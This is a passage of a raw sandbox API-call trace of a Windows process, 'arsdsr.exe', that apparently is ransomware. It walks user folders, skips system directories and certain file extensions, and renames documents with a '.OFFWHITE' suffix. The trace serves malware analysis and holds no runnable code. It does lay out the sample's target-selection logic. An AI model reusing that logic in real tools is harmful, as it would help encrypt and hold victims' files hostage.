nNumberOfBytesToWrite=0x11203, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x11203, lpOverlapped=0x0) returned 1 [0134.375] GetProcessHeap () returned 0x500000 [0134.376] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0134.376] CloseHandle (hObject=0xb0) returned 1 [0134.378] GetProcessHeap () returned 0x500000 [0134.378] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.378] GetProcessHeap () returned 0x500000 [0134.378] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.378] GetProcessHeap () returned 0x500000 [0134.378] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.378] GetProcessHeap () returned 0x500000 [0134.378] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.378] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZE64.docx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZE64.docx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZE64.docx" [0134.378] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZE64.docx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZE64.docx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZE64.docx.OFFWHITE" [0134.378] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZE64.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ze64.docx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZE64.docx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ze64.docx.offwhite")) returned 1 [0134.379] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8eade10, ftCreationTime.dwHighDateTime=0x1d55e62, ftLastAccessTime.dwLowDateTime=0xdfd4bf0, ftLastAccessTime.dwHighDateTime=0x1d55ad7, ftLastWriteTime.dwLowDateTime=0xdfd4bf0, ftLastWriteTime.dwHighDateTime=0x1d55ad7, nFileSizeHigh=0x0, nFileSizeLow=0x11203, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="ZE64.docx", cAlternateFileName="ZE64~1.DOC")) returned 0 [0134.379] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0134.379] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0134.379] lstrcmpiW (lpString1="Downloads", lpString2=".") returned 1 [0134.379] lstrcmpiW (lpString1="Downloads", lpString2="..") returned 1 [0134.379] lstrcmpiW (lpString1="Downloads", lpString2="...") returned 1 [0134.379] lstrcmpiW (lpString1="Downloads", lpString2="windows") returned -1 [0134.379] lstrcmpiW (lpString1="Downloads", lpString2="$recycle.bin") returned 1 [0134.379] lstrcmpiW (lpString1="Downloads", lpString2="rsa") returned -1 [0134.379] lstrcmpiW (lpString1="Downloads", lpString2="ntuser.dat") returned -1 [0134.379] lstrcmpiW (lpString1="Downloads", lpString2="programdata") returned -1 [0134.379] lstrcmpiW (lpString1="Downloads", lpString2="appdata") returned 1 [0134.380] lstrcmpiW (lpString1="Downloads", lpString2="program files") returned -1 [0134.380] lstrcmpiW (lpString1="Downloads", lpString2="program files (x86)") returned -1 [0134.380] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0134.380] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Downloads" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0134.380] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0134.380] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0134.380] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*" [0134.380] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0134.380] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0134.380] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0134.380] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0134.380] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0134.380] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0134.380] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0134.380] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0134.380] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0134.380] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0134.380] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0134.380] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0134.380] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0134.381] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0134.381] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0134.381] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0134.381] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0134.381] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0134.381] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" [0134.381] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.381] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.381] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0134.381] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0134.381] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0134.381] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0134.381] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0134.381] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0134.381] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0134.381] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0134.381] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0134.381] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0134.381] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0134.381] lstrcmpiW (lpString1="Favorites", lpString2=".") returned 1 [0134.381] lstrcmpiW (lpString1="Favorites", lpString2="..") returned 1 [0134.381] lstrcmpiW (lpString1="Favorites", lpString2="...") returned 1 [0134.381] lstrcmpiW (lpString1="Favorites", lpString2="windows") returned -1 [0134.381] lstrcmpiW (lpString1="Favorites", lpString2="$recycle.bin") returned 1 [0134.381] lstrcmpiW (lpString1="Favorites", lpString2="rsa") returned -1 [0134.381] lstrcmpiW (lpString1="Favorites", lpString2="ntuser.dat") returned -1 [0134.381] lstrcmpiW (lpString1="Favorites", lpString2="programdata") returned -1 [0134.381] lstrcmpiW (lpString1="Favorites", lpString2="appdata") returned 1 [0134.381] lstrcmpiW (lpString1="Favorites", lpString2="program files") returned -1 [0134.382] lstrcmpiW (lpString1="Favorites", lpString2="program files (x86)") returned -1 [0134.382] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0134.382] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Favorites" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0134.382] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0134.382] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0134.382] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*" [0134.382] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0134.384] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0134.384] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0134.384] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0134.384] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0134.384] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0134.385] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0134.385] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0134.385] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0134.385] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0134.385] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0134.385] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0134.385] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0134.385] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0134.385] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0134.385] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0134.385] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0134.385] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0134.385] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" [0134.385] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.385] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.385] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0134.385] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0134.385] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0134.385] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0134.385] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0134.385] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0134.385] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0134.385] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0134.385] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Links", cAlternateFileName="")) returned 1 [0134.385] lstrcmpiW (lpString1="Links", lpString2=".") returned 1 [0134.385] lstrcmpiW (lpString1="Links", lpString2="..") returned 1 [0134.385] lstrcmpiW (lpString1="Links", lpString2="...") returned 1 [0134.385] lstrcmpiW (lpString1="Links", lpString2="windows") returned -1 [0134.385] lstrcmpiW (lpString1="Links", lpString2="$recycle.bin") returned 1 [0134.385] lstrcmpiW (lpString1="Links", lpString2="rsa") returned -1 [0134.385] lstrcmpiW (lpString1="Links", lpString2="ntuser.dat") returned -1 [0134.385] lstrcmpiW (lpString1="Links", lpString2="programdata") returned -1 [0134.386] lstrcmpiW (lpString1="Links", lpString2="appdata") returned 1 [0134.386] lstrcmpiW (lpString1="Links", lpString2="program files") returned -1 [0134.386] lstrcmpiW (lpString1="Links", lpString2="program files (x86)") returned -1 [0134.386] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0134.386] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Links" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0134.386] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0134.386] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0134.386] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*" [0134.386] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0134.386] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0134.386] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0134.386] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0134.386] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0134.386] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0134.386] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0134.386] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0134.386] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0134.386] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0134.386] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0134.386] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0134.386] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0134.387] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0134.387] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0134.387] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0134.387] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0134.387] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0134.387] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" [0134.387] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.387] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.387] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0134.387] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0134.387] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0134.387] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0134.387] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0134.387] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0134.387] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0134.387] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0134.387] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0134.387] lstrcmpiW (lpString1="Suggested Sites.url", lpString2=".") returned 1 [0134.387] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="..") returned 1 [0134.387] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="...") returned 1 [0134.387] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="windows") returned -1 [0134.387] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="$recycle.bin") returned 1 [0134.387] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="rsa") returned 1 [0134.387] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="ntuser.dat") returned 1 [0134.387] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="programdata") returned 1 [0134.387] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="appdata") returned 1 [0134.387] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="program files") returned 1 [0134.387] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="program files (x86)") returned 1 [0134.387] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0134.387] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="Suggested Sites.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" [0134.387] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.388] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.388] PathFindExtensionW (pszPath="Suggested Sites.url") returned=".url" [0134.388] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.388] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.388] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.388] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.388] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.388] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.388] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.388] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.388] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.388] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0134.388] lstrcmpiW (lpString1="Web 